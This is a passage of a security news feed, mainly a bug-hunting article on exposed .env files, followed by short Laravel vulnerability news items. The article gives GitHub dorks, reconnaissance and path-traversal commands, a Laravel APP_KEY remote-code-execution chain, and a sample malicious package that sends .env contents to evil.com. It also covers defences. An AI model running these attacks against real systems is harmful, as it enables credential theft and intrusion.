contain:</p><pre>DB_HOST=production-db.internal.corp.com<br>DB_DATABASE=main_production<br>DB_USERNAME=root<br>DB_PASSWORD=Str0ng!Passw0rd<br>APP_KEY=base64:abcdef1234567890abcdef1234567890<br>AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE<br>AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY<br>STRIPE_SECRET=sk_live_4eC39HqLyjWDarjtT1zdp7dc<br>REDIS_HOST=127.0.0.1<br>REDIS_PASSWORD=secret<br>MAIL_USERNAME=admin@corp.com<br>MAIL_PASSWORD=smtp_password_here</pre><p>One file. One misconfiguration. Total compromise.</p><h3>The 2024 Unit 42 Campaign: Scale of the Problem</h3><p>In August 2024, Palo Alto Networks’ Unit 42 uncovered a massive cloud extortion campaign that directly exploited exposed .env files. The numbers are staggering:</p><ul><li>110,000 domains scanned for exposed .env files</li><li>90,000+ unique leaked environment variables harvested</li><li>7,000+ cloud service credentials (AWS, Azure, GCP, DigitalOcean)</li><li>1,500+ social media account credentials</li><li>1,185 unique AWS access keys</li><li>333 PayPal OAuth tokens</li><li>235 GitHub tokens</li><li>111 HubSpot API keys</li><li>39 Slack webhooks</li></ul><p>The attack chain was elegant and terrifying:</p><blockquote>Scan — Automated internet-wide scanning using malicious AWS Lambda functions, iterating over millions of domains with curl requests to http://&lt;target&gt;/.env</blockquote><blockquote>Harvest — Extract all environment variables from accessible .env files</blockquote><blockquote>Escalate — Use exposed IAM access keys to create new IAM roles with administrative permissions</blockquote><blockquote>Propagate — Deploy new Lambda functions to continue scanning from within the victim’s own cloud infrastructure</blockquote><blockquote>Exfiltrate — Steal data from S3 buckets and other cloud storage</blockquote><blockquote>Extort — Leave ransom notes threatening to sell the data on the dark web</blockquote><p><strong>Source:</strong> <a href="https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/">Unit 42 — Large-Scale Cloud Extortion Operation</a></p><h3>The 2026 Security Affairs Study: 12 Million Files</h3><p>Fast forward to February 2026: Security Affairs reported that researchers had identified over 12 million exposed .env files across the internet. The primary exposure vectors:</p><ol><li>Web server misconfiguration — No rule blocking hidden files (files starting with a dot). Simply visiting https://example.com/.env returns the entire file.</li><li>Reverse proxies forwarding sensitive paths — Nginx or Apache misconfigured to serve static files from the project root.</li><li>Container images embedding secrets — Dockerfiles using COPY . . which includes .env in the image layers.</li><li>Forgotten backup files — .env.bak, .env.old, .env.save, env.txt left in web-accessible directories.</li><li>Git repository exposure — The .env file committed to source control, then the repo made public or accessed via exposed .git directories.</li></ol><h3>Part II: Real-World Bug Hunting with .env Files</h3><h3>Case Study 1: Azure Subdomain .env Disclosure</h3><p>Source: Infosec Writeups / Bug Bounty Program</p><p>A bug bounty hunter was conducting reconnaissance on a target and discovered a subdomain that appeared to be running Laravel. Using ffuf for content discovery, they ran a wordlist against the subdomain:</p><pre>ffuf -u https://target-subdomain.azurewebsites.net/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt</pre><p>The scan returned a 200 OK for /.env -- but accessing it directly returned a 403 Forbidden. The hunter noticed something critical: the CNAME record pointed to *.azurewebsites.com, and while the main domain had restrictions, the underlying Azure-hosted subdomain did not.</p><p>By accessing the raw Azure endpoint URL, the .env file was fully readable, revealing:</p><pre>DB_CONNECTION=mysql<br>DB_HOST=internal-db.mysql.database.azure.com<br>DB_PORT=3306<br>DB_DATABASE=production_db<br>DB_USERNAME=admin<br>DB_PASSWORD=P@ssw0rd!<br>MAIL_HOST=smtp.sendgrid.net<br>MAIL_USERNAME=apikey<br>MAIL_PASSWORD=SG.xxxxxxxxxxxxxxxx</pre><p>Impact: Database credentials + SMTP API key for SendGrid. With these, the hunter could have dumped the entire production database and sent phishing emails as the legitimate domain.</p><h3>Case Study 2: Laravel APP_KEY to RCE Chain</h3><p>Source: Multiple researchers (Mogwai Labs, Ghostable, Stratosally)</p><p>This is one of the most dangerous exploitation chains in the Laravel ecosystem. The .env file contains APP_KEY, which is the cryptographic backbone of the entire Laravel application. It is used for encrypting cookies, session data, and serialized objects.</p><p>The vulnerability: Laravel’s Crypt::decrypt() function uses PHP's unserialize() under the hood. If an attacker has the APP_KEY, they can craft a malicious encrypted payload that, when decrypted, triggers PHP object injection leading to Remote Code Execution.</p><p>The exploitation chain:</p><ol><li>Discover the APP_KEY — Find it in an exposed .env file, or via GitHub dorking (filename:.env APP_KEY).</li><li>Use phpggc — The PHP Generic Gadget Chains tool (phpggc) generates gadget chains for Laravel.</li></ol><pre># Clone phpggc<br>git clone https://github.com/ambionics/phpggc<br>cd phpggc<br><br># Generate a Laravel RCE gadget chain<br>php phpggc Laravel/RCE1 system 'id' --base64</pre><p>3. Encrypt with the APP_KEY — The attacker encrypts the malicious payload using the stolen APP_KEY:</p><pre># Pseudocode for encrypting with the leaked APP_KEY<br>$payload = base64_decode('&lt;phpggc_output&gt;');<br>$key = base64_decode(substr('base64:abcdef1234567890abcdef1234567890', 7));<br>$iv = random_bytes(16);<br>$encrypted = openssl_encrypt($payload, 'aes-256-cbc', $key, OPENSSL_RAW_DATA, $iv);<br>$final = base64_encode($iv . $encrypted);</pre><p>4. Deliver the payload — Send the encrypted value as a Laravel session cookie or any other decrypted input.</p><p>5. RCE — Laravel decrypts the payload, PHP unserializes it, and the attacker’s command executes.</p><p>Real-world impact: In 2025, researchers found hundreds of Laravel APP_KEY values leaked on GitHub. Tools like phpggc make weaponization trivial. The attacker does not need SQL injection or file upload -- just one exposed .env file.</p><h3>Case Study 3: GitHub Dorking for .env Files at Scale</h3><p>Source: Multiple bug bounty hunters</p><p>Advanced GitHub dorking is one of the most productive techniques for finding exposed .env files. The key operators:</p><pre># Find all .env files across all public repositories<br>filename:.env<br><br># Find .env files in a specific organization<br>org:targetcompany filename:.env<br><br># Find .env files containing specific sensitive keys<br>filename:.env "AWS_ACCESS_KEY_ID"<br>filename:.env "DB_PASSWORD"<br>filename:.env "STRIPE_SECRET"<br>filename:.env "APP_KEY"<br><br># Find .env files mentioning a specific domain<br>"target.com" filename:.env<br><br># Combined: target company .env with API keys<br>org:targetcompany filename:.env ("API_KEY" OR "SECRET" OR "PASSWORD")<br><br># Search for config files broadly<br>filename:.env "production" AND ("sk_live" OR "AKIA" OR "service_role")</pre><p>Pro tip from hunters: Combine with extension: and path: operators:</p><pre># Search specific paths<br>path:config filename:.env<br>path:laravel filename:.env<br><br># Search for backup variants<br>filename:.env.bak<br>filename:.env.old<br>filename:.env.local<br>filename:.env.production</pre><p>The Snyk 2025 State of Secrets Report revealed that 28 million credentials were leaked on GitHub in 2025 alone, with .env files being one of the top sources.</p><h3>Case Study 4: Exposed Source Maps Leading to Stripe Secret Keys</h3><p>Source: Sentry Security Blog / Prodefense.io</p><p>A bug bounty hunter discovered that a target website had accidentally deployed JavaScript source maps to production. Source maps (.map files) are used during development to map minified JavaScript back to original source code for debugging.</p><p>The attacker used Sourcemapper (a tool that reconstructs original source from .map files):</p><pre># Install sourcemapper<br>pip install sourcemapper<br><br># Download and reconstruct source from an exposed source map<br>sourcemapper -url https://target.com/assets/js/app.js.map -output ./reconstructed/</pre><p>Inside the reconstructed source code, the hunter found:</p><pre>// Original source code exposed<br>const stripe = require('stripe');<br>const stripeClient = new stripe('sk_live_4eC39HqLyjWDarjtT1zdp7dc');<br><br>// Internal API endpoints<br>const adminApi = 'https://internal-admin.target.com/api/v2/';<br>const deleteUserEndpoint = `${adminApi}users/delete/`;</pre><p>Impact: The Stripe live secret key (starting with sk_live_) allowed the attacker to make unauthorized charges, refunds, and access all customer payment data. The exposed admin API endpoints opened the door for further exploitation.</p><h3>Case Study 5: Exposed .git Directory — Full Source Code in Version Control History</h3><p><em>Source: PortSwigger Web Security Academy / NCSC Switzerland</em></p><p>A production server had its .git directory publicly accessible. The .git folder contains the complete version control history of the project, including every file that was ever committed -- even files that were later deleted or whose secrets were "removed" in subsequent commits.</p><pre># Recursively download the entire .git directory from the live server<br>wget -r https://target.com/.git/<br><br># Check the Git log for secrets that were "removed"<br>git log -p | grep -E 'password|secret|key|token|AKIA'</pre><p>The NCSC Switzerland audit found 1,300 affected systems in Switzerland alone where .git folders were publicly accessible, exposing source code, access data, and passwords.</p><p>Real bug bounty example: A hunter found that a target’s .git directory was browsable. Running git log --diff revealed a commit message: <em>"Remove admin password from config"</em>. The diff showed the previous version of the config file with the hardcoded admin password still in Git history:</p><pre>git show &lt;commit_hash&gt;<br># Output:<br># - ADMIN_PASSWORD=SuperSecretPass123!<br># + ADMIN_PASSWORD=${ADMIN_PASSWORD_ENV}</pre><p>The password was removed from the current file but remained forever in Git history. The hunter logged in as administrator and completely took over the application.</p><h3>Part III: Advanced Reconnaissance &amp; Hunting Methodology</h3><h3>Phase 1: Subdomain Enumeration</h3><p>Before you can find exposed files, you need to know where to look.</p><pre># Passive enumeration<br>subfinder -d target.com -o subdomains.txt<br>amass enum -passive -d target.com -o amass.txt<br>assetfinder --subs-only target.com &gt;&gt; subdomains.txt<br><br># Active enumeration<br>ffuf -u https://FUZZ.target.com -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt<br><br># Certificate Transparency<br>curl -s "https://crt.sh/?q=%25.target.com&amp;output=json" | jq -r '.[].name_value' | sort -u<br><br># Combine and deduplicate<br>cat subdomains.txt | sort -u | httpx -silent -o live_hosts.txt</pre><h3>Phase 2: Content Discovery for .env Files</h3><pre># Using ffuf for .env file discovery<br>ffuf -u https://target.com/FUZZ \<br>  -w wordlist.txt \<br>  -fc 403,404 \<br>  -t 100<br><br># .env-specific wordlist<br>echo ".env<br>.env.bak<br>.env.old<br>.env.save<br>.env.local<br>.env.production<br>.env.development<br>env.txt<br>env<br>.env.example" &gt; env_wordlist.txt<br><br># Recursive discovery with feroxbuster<br>feroxbuster -u https://target.com \<br>  -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories.txt \<br>  -x env,txt,bak,old,swp,save,conf,config \<br>  --depth 3 \<br>  --silent</pre><h3>Phase 3: Advanced GitHub Dorking</h3><pre># Automated GitHub dorking with gitdorker<br>gitdorker -q target.com -tf ./tf/ -d ./Dorks/Alldorks.ndjson -o output<br><br># Manual targeted dorks<br>site:github.com target.com filename:.env<br>site:github.com target.com "DB_PASSWORD"<br>site:github.com target.com "sk_live_" "Stripe"<br>site:github.com target.com "AKIA" "AWS"<br>site:github.com "target" filename:".env" "APP_KEY"</pre><h3>Phase 4: Source Map Enumeration</h3><pre># Check for source maps on live targets<br>cat live_hosts.txt | while read url; do<br>  # Try common source map locations<br>  curl -s -o /dev/null -w "%{http_code}" "$url/assets/js/app.js.map"<br>  curl -s -o /dev/null -w "%{http_code}" "$url/static/js/main.js.map"<br>  curl -s -o /dev/null -w "%{http_code}" "$url/build/static/js/main.js.map"<br>done<br><br># Reconstruct and grep for secrets<br>sourcemapper -url https://target.com/js/app.js.map -output ./recon/<br>grep -rni "sk_live\|AKIA\|password\|secret\|token" ./recon/</pre><h3>Phase 5: Directory Traversal Testing</h3><p>Sometimes .env files are not at the root but accessible through path traversal:</p><pre># Path traversal payloads<br>ffuf -u https://target.com/page.php?file=FUZZ \<br>  -w traversal_wordlist.txt<br><br># Common traversal wordlist entries<br>../../../.env<br>..%252f..%252f..%252f.env<br>....//....//....//.env<br>..\;../..\;../.env<br>/static/../../../.env</pre><h3>Part IV: The Expanded Attack Surface Beyond .env</h3><h3>Source Maps</h3><p>Source maps (.map files) are JavaScript's hidden tell-all. They reconstruct minified code back to the original source, complete with comments, function names, and file structure.</p><p>What source maps can reveal:</p><ul><li>Original source code and business logic</li><li>Developer comments (TODOs, FIXMEs, known bugs)</li><li>Internal API endpoints and admin panels</li><li>Hardcoded credentials</li><li>Third-party integration details</li><li>Environment variable expectations</li></ul><pre># Check for common source map locations<br>curl -si https://target.com/static/js/main.abc123.js.map<br>curl -si https://target.com/assets/js/app.js.map<br>curl -si https://target.com/build/js/bundle.js.map<br><br># Parse source maps for secrets (Node.js)<br>npm install -g source-map-cli<br>curl -s https://target.com/js/app.js.map | source-map --raw | grep -E 'key|token|secret|password'</pre><h3>Exposed .git Directories</h3><p>The .git directory is perhaps the most dangerous exposure because it contains the entire history of the project.</p><p>Tools for .git exploitation:</p><pre># git-dumper - downloads entire .git repo<br>git-dumper https://target.com/.git/ ./downloaded_repo/<br><br># GitTools - extract from exposed .git<br>git clone https://github.com/internetwache/GitTools<br>cd GitTools/Dumper<br>./gitdumper.sh https://target.com/.git/ ./repo/<br>cd GitTools/Extractor<br>./extractor.sh ./repo/ ./extracted/<br><br># Search entire Git history for secrets<br>cd extracted<br>git log --all -p | grep -E '(password|secret|key|token|AKIA|sk_live)'<br>git log --all --diff-filter=D --summary | grep delete  # Find deleted files</pre><h3>Backup Files</h3><p>Developers frequently create backup files during maintenance:</p><pre># Common backup file extensions<br>.bak, .old, .orig, .copy, .tmp, .swp, .swo, .save, ~ (tilde)<br><br># Fuzzing for backup files<br>ffuf -u https://target.com/FUZZ \<br>  -w backup_wordlist.txt<br><br># Example wordlist entries<br>config.php.bak<br>.env.bak<br>database.php.old<br>wp-config.php~<br>index.php.swp<br>.env.save</pre><h3>Configuration Files</h3><p>Beyond .env, other config files often contain secrets:</p><pre># Common config files to hunt<br>config.json<br>config.php<br>config.js<br>settings.py<br>application.properties<br>application.yml<br>database.yml<br>credentials.json<br>service-account.json<br>wp-config.php</pre><h3>Part V: The Supply Chain Angle — Malicious Dependencies</h3><p>Malicious packages actively hunt for .env files during installation. Since npm install (and pip install, gem install, etc.) can execute arbitrary code, a compromised dependency can:</p><pre>// Malicious package.js (hypothetical but based on real incidents)<br>const fs = require('fs');<br>const https = require('https');<br><br>// Read .env file<br>const envContent = fs.readFileSync('.env', 'utf8');<br><br>// Exfiltrate to attacker server<br>https.get(`https://evil.com/exfil?data=${Buffer.from(envContent).toString('base64')}`);</pre><p>Real incidents:</p><ul><li>Shai-Hulud NPM worm — Designed to hunt and exfiltrate NPM and GitHub tokens at scale</li><li>@ctrl/tinycolor compromise (2.2M weekly downloads) — Attackers weaponized TruffleHog itself as a payload to find and exfiltrate secrets</li><li>node-ipc supply chain attack — Malicious versions published to target specific developers</li><li>Cursor AI editor incident (2024) — .env file contents were being sent to servers for tab completion, even when files were listed in .cursorignore</li></ul><h3>Part VI: Defense in Depth — How to Protect Against .env Exposure</h3><h3>Immediate Remediation</h3><ol><li>Block hidden files at the server level</li></ol><pre># Apache<br>&lt;FilesMatch "^\."&gt;<br>    Require all denied<br>&lt;/FilesMatch&gt;</pre><pre># Nginx<br>location ~ /\.(?!well-known) {<br>    deny all;<br>    return 404;<br>}</pre><pre>// IIS<br>&lt;system.webServer&gt;<br>    &lt;security&gt;<br>        &lt;requestFiltering&gt;<br>            &lt;hiddenSegments&gt;<br>                &lt;add segment=".env" /&gt;<br>            &lt;/hiddenSegments&gt;<br>        &lt;/requestFiltering&gt;<br>    &lt;/security&gt;<br>&lt;/system.webServer&gt;</pre><p>2. Remove .env from web-accessible directories -- Move it outside the document root.</p><p>3. Implement CSP headers to restrict where scripts can load from.</p><p>4. Disable source maps in production builds:</p><pre>// webpack.config.js<br>module.exports = {<br>  // ...<br>  devtool: process.env.NODE_ENV === 'production' ? false : 'source-map',<br>};<br><br>// vite.config.js<br>export default defineConfig({<br>  build: {<br>    sourcemap: process.env.NODE_ENV !== 'production',<br>  },<br>});<br><br>// next.config.js<br>module.exports = {<br>  productionBrowserSourceMaps: false,<br>};</pre><h3>Prevention</h3><ol><li>Use a secrets manager — HashiCorp Vault, AWS Secrets Manager, Azure Key Vault, GCP Secret Manager</li><li>Implement .gitignore correctly and audit with git-secrets or trufflehog</li><li>Use pre-commit hooks to scan for secrets:</li></ol><pre># .pre-commit-config.yaml<br>repos:<br>  - repo: https://github.com/awslabs/git-secrets<br>    rev: master<br>    hooks:<br>      - id: git-secrets</pre><p>4. Rotate secrets regularly — If a .env file might have been exposed, rotate every credential in it immediately.</p><p>5. Scanner automation — Integrate secret scanning into CI/CD pipelines:</p><pre># TruffleHog scan in CI<br>trufflehog filesystem --directory=. --json | jq '.'</pre><p>6. Use ephemeral credentials — Short-lived tokens (IAM roles, OAuth2 token exchange) instead of long-lived API keys.</p><h3>Detection</h3><ol><li>Monitor for /.env requests in access logs</li><li>Use automated scanners like shhgit, trufflehog, git-secrets</li><li>Deploy canary tokens — Fake credentials placed in .env files that alert when used</li></ol><h3>Part VII: The 2026 Vibe Coding Problem</h3><p>The rise of AI-assisted development — “vibe coding” — has introduced a new dimension to the .env crisis. Research from 2026 shows that AI-generated code frequently makes mistakes that expose secrets:</p><ul><li>Hallucinated dependencies — AI tools generate package.json files with packages that do not exist in the registry, creating opportunities for typosquatting attacks</li><li>Hardcoded credentials — AI models trained on public code learn the pattern of hardcoding secrets and reproduce it</li><li>Source maps left enabled — Default build configurations generated by AI often leave source maps enabled for production</li><li>Missing server blocks — AI-generated deployment configs rarely include rules to block hidden files</li></ul><p>The fix: Treat AI-generated code as untrusted input. Audit every file for secrets before deployment. Use automated scanners in CI/CD.</p><h3>References</h3><ul><li><a href="https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/">Unit 42 — Large-Scale Cloud Extortion Operation via Exposed .env Files</a></li><li><a href="https://securityaffairs.com/188590/hacking/12-million-exposed-env-files-reveal-widespread-security-failures.html">Security Affairs — 12 Million Exposed .env Files</a></li><li><a href="https://snyk.io/articles/state-of-secrets/">Snyk 2025 State of Secrets — 28M Credentials Leaked on GitHub</a></li><li><a href="https://blog.sentry.security/abusing-exposed-sourcemaps/">Sentry Security Blog — Abusing Exposed Sourcemaps</a></li><li><a href="https://mogwailabs.de/en/blog/2022/08/exploiting-laravel-based-applications-with-leaked-app_keys-and-queues/">Mogwai Labs — Exploiting Laravel with Leaked APP_KEYs</a></li><li><a href="https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/05-Review_Web_Page_Content_for_Information_Leakage">OWASP — Review Web Page Content for Information Leakage</a></li><li><a href="https://github.com/techgaun/github-dorks">GitHub Dorking — techgaun/github-dorks</a></li><li><a href="https://www.invicti.com/web-application-vulnerabilities/dotenv-env-file">Invicti — Dotenv .env File Vulnerability</a></li><li><a href="https://vibe-eval.com/data-studies/frontend-secrets-leak-report-2026/">Vibe Eval 2026 — Frontend Secrets Leak Report</a></li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*vJZv0GNgEFzmfX6QmvfmOQ.png"><figcaption>Follow Me</figcaption></figure><p><em>GitHub: </em><a href="https://github.com/SecurityTalent"><em>SecurityTalent</em></a><em> | Medium: </em><a href="https://medium.com/@securitytalent"><em>Security Talent</em></a><em> | Twitter: </em><a href="https://twitter.com/Securi3yTalent"><em>Securi3yTalent</em></a><em> </em>| Facebook: <a href="https://www.facebook.com/Securi3ytalent/">Securi3ytalent</a> | Telegram: <a href="https://t.me/Securi3yTalent">Securi3yTalent</a></p><p>#CyberSecurity #BugBounty #BugBountyHunter #EthicalHacking #InfoSec #WebSecurity #ApplicationSecurity #AppSec #CloudSecurity #FrontendSecurity #WebDevelopment #JavaScript #ReactJS #Laravel #NodeJS #DevSecOps #OWASP #SecretsManagement #GitHub #GitHubDorks #SourceMaps #EnvFiles #SecurityResearch #PenetrationTesting #RedTeam #BlueTeam #CloudComputing #AWS #Azure #GoogleCloud #VibeCoding #AI #SecureCoding #DeveloperSecurity #TechBlog #Programming</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=60c4fd28ab4b" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/frontend-security-bug-hunting-the-env-file-crisis-and-real-world-exploitation-60c4fd28ab4b">Frontend Security &amp; Bug Hunting: The .env File Crisis and Real-World Exploitation</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Laravel-Lang-Stealer stiehlt Cloud-, Browser- und Vault-Daten]]></title>
<description><![CDATA[Sicherheitsforscher haben einen Supply-Chain-Angriff auf die PHP-Pakete der Laravel-Lang-Organisation dokumentiert. Die Angreifer schrieben über 700 Git-Tags um und betteten einen plattformübergreifenden Credential-Stealer ein, der Cloud-Zugänge, Browser-Daten und Passwort-Tresore ab­greift. Die ...]]></description>
<link>https://tsecurity.de/de/3571515/it-security-nachrichten/laravel-lang-stealer-stiehlt-cloud-browser-und-vault-daten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3571515/it-security-nachrichten/laravel-lang-stealer-stiehlt-cloud-browser-und-vault-daten/</guid>
<pubDate>Thu, 04 Jun 2026 07:23:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Sicherheitsforscher haben einen Supply-Chain-Angriff auf die PHP-Pakete der Laravel-Lang-Organisation dokumentiert. Die Angreifer schrieben über 700 Git-Tags um und betteten einen plattformübergreifenden Credential-Stealer ein, der Cloud-Zugänge, Browser-Daten und Passwort-Tresore ab­greift. Die Schadroutine startet automatisch bei jedem Hochfahren einer Anwendung, die ein betroffenes Paket einbindet.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-31114 | Laravel-Backpack CRUD up to 4.0.62/4.1.68/5.0.12 getMessage cross site scripting (EUVD-2022-55999)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, was found in Laravel-Backpack CRUD up to 4.0.62/4.1.68/5.0.12. This impacts the function getMessage. Executing a manipulation can lead to cross site scripting.

This vulnerability is handled as CVE-2022-31114. The attack can be executed remote...]]></description>
<link>https://tsecurity.de/de/3571011/sicherheitsluecken/cve-2022-31114-laravel-backpack-crud-up-to-406241685012-getmessage-cross-site-scripting-euvd-2022-55999/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3571011/sicherheitsluecken/cve-2022-31114-laravel-backpack-crud-up-to-406241685012-getmessage-cross-site-scripting-euvd-2022-55999/</guid>
<pubDate>Thu, 04 Jun 2026 00:53:29 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, was found in <a href="https://vuldb.com/product/laravel-backpack:crud">Laravel-Backpack CRUD up to 4.0.62/4.1.68/5.0.12</a>. This impacts the function <code>getMessage</code>. Executing a manipulation can lead to cross site scripting.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2022-31114">CVE-2022-31114</a>. The attack can be executed remotely. There is not any exploit available.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Laravel CRLF Injection Vulnerability Enables an Attacker to Interfere with Outbound Email Processing]]></title>
<description><![CDATA[A high-severity CRLF injection vulnerability in the Laravel framework, tracked as CVE-2026-48019, could allow attackers to interfere with outbound email processing in affected applications. The issue impacts Laravel versions up to 13.9.0 and versions before 12.60.0, and has been patched…
Read mor...]]></description>
<link>https://tsecurity.de/de/3569768/it-security-nachrichten/laravel-crlf-injection-vulnerability-enables-an-attacker-to-interfere-with-outbound-email-processing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569768/it-security-nachrichten/laravel-crlf-injection-vulnerability-enables-an-attacker-to-interfere-with-outbound-email-processing/</guid>
<pubDate>Wed, 03 Jun 2026 15:38:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A high-severity CRLF injection vulnerability in the Laravel framework, tracked as CVE-2026-48019, could allow attackers to interfere with outbound email processing in affected applications. The issue impacts Laravel versions up to 13.9.0 and versions before 12.60.0, and has been patched…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/laravel-crlf-injection-vulnerability-enables-an-attacker-to-interfere-with-outbound-email-processing/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/laravel-crlf-injection-vulnerability-enables-an-attacker-to-interfere-with-outbound-email-processing/">Laravel CRLF Injection Vulnerability Enables an Attacker to Interfere with Outbound Email Processing</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Laravel CRLF Injection Vulnerability Enables an Attacker to Interfere with Outbound Email Processing]]></title>
<description><![CDATA[A high-severity CRLF injection vulnerability in the Laravel framework, tracked as CVE-2026-48019, could allow attackers to interfere with outbound email processing in affected applications. The issue impacts Laravel versions up to 13.9.0 and versions before 12.60.0, and has been patched in 13.10....]]></description>
<link>https://tsecurity.de/de/3569504/it-security-nachrichten/laravel-crlf-injection-vulnerability-enables-an-attacker-to-interfere-with-outbound-email-processing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569504/it-security-nachrichten/laravel-crlf-injection-vulnerability-enables-an-attacker-to-interfere-with-outbound-email-processing/</guid>
<pubDate>Wed, 03 Jun 2026 14:23:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A high-severity CRLF injection vulnerability in the Laravel framework, tracked as CVE-2026-48019, could allow attackers to interfere with outbound email processing in affected applications. The issue impacts Laravel versions up to 13.9.0 and versions before 12.60.0, and has been patched in 13.10.0 and 12.60.0. The vulnerability stems from improper neutralization of carriage return and line […]</p>
<p>The post <a href="https://cybersecuritynews.com/laravel-crlf-injection-vulnerability/">Laravel CRLF Injection Vulnerability Enables an Attacker to Interfere with Outbound Email Processing</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Laravel CRLF Injection Flaw Enables Email Processing Interference]]></title>
<description><![CDATA[A high-severity CRLF injection vulnerability has been disclosed in the Laravel PHP framework, tracked as CVE-2026-48019, exposing web applications to mail relay abuse and unauthorized manipulation of outbound email. Published on June 1, 2026, via GitHub Security Advisory GHSA-5vg9-5847-vvmq, the ...]]></description>
<link>https://tsecurity.de/de/3568760/it-security-nachrichten/laravel-crlf-injection-flaw-enables-email-processing-interference/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3568760/it-security-nachrichten/laravel-crlf-injection-flaw-enables-email-processing-interference/</guid>
<pubDate>Wed, 03 Jun 2026 10:07:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A high-severity CRLF injection vulnerability has been disclosed in the Laravel PHP framework, tracked as CVE-2026-48019, exposing web applications to mail relay abuse and unauthorized manipulation of outbound email. Published on June 1, 2026, via GitHub Security Advisory GHSA-5vg9-5847-vvmq, the flaw carries a CVSS v3.1 base score indicating a high impact on confidentiality and integrity. It […]</p>
<p>The post <a href="https://cyberpress.org/laravel-crlf-injection-flaw/">Laravel CRLF Injection Flaw Enables Email Processing Interference</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Laravel CRLF Injection Flaw Could Disrupt Outbound Email Handling]]></title>
<description><![CDATA[A high-severity vulnerability in the Laravel framework could allow attackers to manipulate outbound email processing, potentially leading to unauthorized message delivery, data exposure, or the abuse of mail relays. The issue, tracked as CVE-2026-48019, stems from improper neutralization of CRLF…...]]></description>
<link>https://tsecurity.de/de/3568685/it-security-nachrichten/laravel-crlf-injection-flaw-could-disrupt-outbound-email-handling/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3568685/it-security-nachrichten/laravel-crlf-injection-flaw-could-disrupt-outbound-email-handling/</guid>
<pubDate>Wed, 03 Jun 2026 09:35:05 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A high-severity vulnerability in the Laravel framework could allow attackers to manipulate outbound email processing, potentially leading to unauthorized message delivery, data exposure, or the abuse of mail relays. The issue, tracked as CVE-2026-48019, stems from improper neutralization of CRLF…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/laravel-crlf-injection-flaw-could-disrupt-outbound-email-handling/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/laravel-crlf-injection-flaw-could-disrupt-outbound-email-handling/">Laravel CRLF Injection Flaw Could Disrupt Outbound Email Handling</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Laravel CRLF Injection Flaw Could Disrupt Outbound Email Handling]]></title>
<description><![CDATA[A high-severity vulnerability in the Laravel framework could allow attackers to manipulate outbound email processing, potentially leading to unauthorized message delivery, data exposure, or the abuse of mail relays. The issue, tracked as CVE-2026-48019, stems from improper neutralization of CRLF ...]]></description>
<link>https://tsecurity.de/de/3568650/it-security-nachrichten/laravel-crlf-injection-flaw-could-disrupt-outbound-email-handling/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3568650/it-security-nachrichten/laravel-crlf-injection-flaw-could-disrupt-outbound-email-handling/</guid>
<pubDate>Wed, 03 Jun 2026 09:22:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A high-severity vulnerability in the Laravel framework could allow attackers to manipulate outbound email processing, potentially leading to unauthorized message delivery, data exposure, or the abuse of mail relays. The issue, tracked as CVE-2026-48019, stems from improper neutralization of CRLF (Carriage Return Line Feed) sequences in Laravel’s default email validation logic. The vulnerability is documented […]</p>
